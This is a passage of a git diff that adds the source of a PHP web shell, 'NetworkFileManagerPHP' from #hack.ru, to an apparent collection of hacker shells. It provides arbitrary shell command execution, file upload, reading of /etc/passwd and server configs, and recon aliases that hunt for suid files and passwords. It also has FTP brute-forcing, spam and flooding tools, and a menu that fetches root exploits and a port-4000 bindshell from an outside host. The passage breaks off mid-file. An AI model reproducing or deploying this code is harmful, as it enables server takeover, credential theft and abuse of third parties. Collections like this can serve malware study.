+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
diff --git a/xakep-shells/PHP/nfm.php.php.txt b/xakep-shells/PHP/nfm.php.php.txt
new file mode 100644
index 0000000..a07b387
--- /dev/null
+++ b/xakep-shells/PHP/nfm.php.php.txt
@@ -0,0 +1,3086 @@
+<?
+error_reporting(5);
+/*
+$use_md5=0; // ���������� ������ �� md5 ��� ���? // 
+$uname="nfm";
+$upass="q1w2e3"; 
+
+
+if (isset($PHP_AUTH_USER) && ($PHP_AUTH_USER==$uname)) {
+ if ($use_md5) {
+  if (md5($PHP_AUTH_PW) != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
+ } else {
+  if ($PHP_AUTH_PW != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
+ }
+} else {
+ Header('WWW-Authenticate: Basic realm="'.$title.'"');
+ Header('HTTP/1.0 401 Unauthorized');
+ exit;
+} */
+if ($action != "download" && $action != "view" ):
+?>
+
+<?
+
+/* ���� ���� ��� �������� ������, ������� ����*/
+$demail ="���� ����";
+
+/* ����� ������ */
+$title="NetworkFileManagerPHP";
+$ver="1.8.private (beta)";
+$sob="C������������ <b><u>channel #hack.ru</u></b>";
+$id="0000001";
+
+/* FTP-���� */
+$filename="/etc/passwd";
+$ftp_server="localhost";
+/* ������ ������ */
+$min="1";
+$max="65535";
+
+/* ������ */
+$aliases=array(
+/* ����� �� ������� ���� ������ � suid ����� */
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+/* ����� �� ������� ���� ������ � sgid ����� */
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+/* ����� �� ������� ������ config.inc.php */
+'find / -type f -name config.inc.php' => 'find config.inc.php files',
+/* ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ���� */
+'find / -perm -2 -ls' => 'find writable directories and files',
+'ls -la' => '---------------------------------------------------------',
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'  
+);
+
+/* ����� � �������������� */
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+
+/* ����� ���������, ����� ������ */
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+$style=<<<style
+<style>
+a.menu   {
+color: #ffffcc;
+text-decoration:none;
+font-family: Times New Roman;
+font-weight: bold;
+     }
+a.menu:hover   {
+color: #FF0000;
+font-family: Times New Roman;
+text-decoration: none
+font-weight: bold;
+          }
+a   {
+color: #000000;
+text-decoration:none;
+font-family: Tahoma;
+font-size: 11px;
+     }
+a:hover   {
+color: #184984;
+font-family: Tahoma;
+text-decoration: underline
+font-size: 11px;
+          }
+td.up{
+color: #996600;
+font-family: Verdana;
+font-weight: normal;
+font-size: 11px;
+}
+.pagetitle {
+font-family: Arial, Helvetica, sans-serif; 
+color: #FFFFFF; 
+text-decoration: none; 
+font-size: 12px
+}
+.alert   {
+color: #FF0000;
+font-family: Tahoma;
+font-size: 11px;
+          }
+.button1 {
+font-size:11px;
+font-weight:bold;
+font-family:Verdana;
+background:#184984;
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+}
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+b {  font-weight: bold}
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+</style>
+style;
+
+/* ����� ������ */
+$style1=<<<table
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+table;
+$style2=<<<table_file
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+table_file;
+$style3=<<<table_dir
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+table_dir;
+$style4=<<<table_files
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+table_files;
+$style_button=<<<button
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+button;
+$style_open=<<<open
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+open;
+$style_close=<<<close
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+close;
+$ins=<<<ins
+<script>
+function ins(text){
+document.hackru.chars_de.value+=text;
+document.hackru.chars_de.focus();
+}
+</script>
+ins;
+
+/* ����� ��������*/
+$form = "
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr>
+  <td align=center class=pagetitle colspan=2><b>������� �� ������� NetworkFileManagerPHP</b></font></b></td>
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+     <tr>
+  <td colspan=2 align=center class=pagetitle><b>�������� �����:</b></td>
+  </tr>
+    <tr>
+      <td width='250' class=pagetitle><b>���� ���:</b></td>
+      <td width='250' class=pagetitle>
+        <input type='text' name='name' size='40' class='inputbox'></td>
+      </tr>
+    <tr>
+      <td width='250' class=pagetitle><b>Email:</b></td>
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+    </tr>
+  
+  <tr>
+  <td colspan=2 align=center class=pagetitle><b>
+  ���� ������� � ���������:
+  </b></font></b></td>
+  </tr>
+  <tr>
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+  <tr>
+  <td align=right><input type='submit' value='����' name='B1' class=button1 $style_button></td>
+      <td align=left><input type='reset' value='��������' name='B2' class=button1 $style_button></td>
+      </tr>
+</form></table><br>
+";
+
+	
+
+/* ����� HTML */
+$HTML=<<<html
+<html>
+<head>
+<title>$title $ver</title>
+$meta
+$style
+$ins
+</head>
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (� #hack.ru)</b> ������: <b>$ver</b> </td></tr>
+<tr><td align=center colspan=6 class=pagetitle bgcolor=#76A8AB>������ ��� ����������������� ������ ����� � �� ������...</td></tr>
+<tr>
+<td class=pagetitle align=center width='85%'><font color=#76A8AB><b>������ �� �������:</b></font></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:�������</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:��������</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:����������</a>&nbsp;&nbsp;</td>
+</tr>
+
+<tr>
+<td class=pagetitle align=center width='85%' ><font color=#FFFF99><b>������� ����:</b></font></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:���� ������</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:������ ���</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:��������� �����</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:���� Mysql</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=del'>.:������� NFM</a>&nbsp;&nbsp;</td>
+</tr>
+<tr>
+<td class=pagetitle align=center width='85%' ><font color=#9BD09B><b>������ � ����������:</b></font></td>
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:������� ���</a>&nbsp;&nbsp;</td>
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Explots</a>&nbsp;&nbsp;</td>
+<tr>
+<td class=pagetitle align=center width='85%'><font color=#AB879C><b>��������� ����:</b></font></td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:��������</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:�����������</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:������</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:��������� ��������</a>&nbsp;&nbsp;</td>
+</tr>
+<td class=pagetitle align=center width=85%><font color=#FF3300><b>���� ���������:</b></font></td>
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=flud'>.:���� Email</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=fludicq'>.:���� ICQ</a>&nbsp;&nbsp;</td>
+<tr>
+<tr>
+<td class=pagetitle align=center width='85%' colspan=6 bgcolor=#76A8AB>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+</tr>
+<tr>
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='http://hackru.info/bugtraq'>.:Bugtraq</td>
+
+</tr>
+</table>
+html;
+/* ������ ��������� �������� ������ ���������*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+/* ������ ���� � �����, ��� ����� ��������� ���������*/
+$public_site = "http://hackru.info/adm/exploits/public_exploits/"; 
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+/* ��������� ��������� */
+$public[1] = "s"; // ���
+$title_ex[1] = "
+&nbsp;&nbsp;bindtty.c - ��������� ��� � ������� apache, ������ ������ ��� ������������� � �������� �� 4000 ����<br>
+<dd><b>������:</b> ./s<br>
+&nbsp;&nbsp;&nbsp;���������� ����� ������ �������� ����� ������ ��� <u><b>putty</b></u> � <u><b>SecureCRT</b></u>
+";
+$public[2] = "m"; // ������
+$title_ex[2] = "
+&nbsp;&nbsp;MREMAP - ��������� �������� �������� ���������� ROOT, ���������� ������������ ������.<br>
+<dd><b>������:</b> ./m<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$public[3] = "p"; // ptrace
+$title_ex[3] = "
+&nbsp;&nbsp;PTRACE - ������ ������ ��������, �������� ����� ��� � mremap<br>
+<dd><b>������:</b> ./p<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+$title_ex[4] = "
+&nbsp;&nbsp;psyBNC - ��������� ������, ����������� �������� ��� IRC<br>
+<dd><b>������������:</b> tar -zxf psyBNC2.3.2-4.tar.gz // �������� ����� <u>psybnc</u><br>
+<dd><b>���� � ������:</b> make // ������������� �� ������ ��� psybnc // ./psybnc // ����� �������� ������ � ������� nfm<br>
+&nbsp;&nbsp;&nbsp;����� ��������� � ������� �����!!! ������ �������� ����� �� ���� ��������!!!
+";
+/* ��������� ��������� */
+$private[1] = "brk"; // localroot root linux 2.4.*
+$title_exp[1] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ��������� ������, ������ ROOT �� ��������������� ������, �������� ����� ��� � mremap<br>
+<dd><b>������:</b> ./brk<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+$title_exp[2] = "
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - ��������� ������, ������ ROOT �� ��������������� ������, ��� ������� ������ Glftpd <br>
+<dd>������� 2 �����: <b>dupescan</b> � <b>glftpd</b> ��� ��������� root ����, ���������� �������� ���� dupescan � ����������<br>
+/glftpd/bin/ �������� <u>cp dupescan /glftpd/bin/</u>, ����� ���� �� bash ���� ��������� <u>./glftpd</u>. ��� ��� ���������!!!<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$private[3] = "glftpd";
+$title_exp[3] = "
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - ��������� ������, ������ ROOT �� ��������������� ������, ��� ������� ������ Glftpd <br>
+������ ����� ���������<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$private[4] = "sortrace";
+$title_exp[4] = "
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - ��������� ������, ������ ROOT �� ��������������� ������, ����� ������ traceroute<br>
+<dd><b>������:</b> ./sortrace<br>
+&nbsp;&nbsp;&nbsp;��������� ������ �� ��� bash ����!!!
+";
+$private[5] = "root";
+$title_exp[5] = "
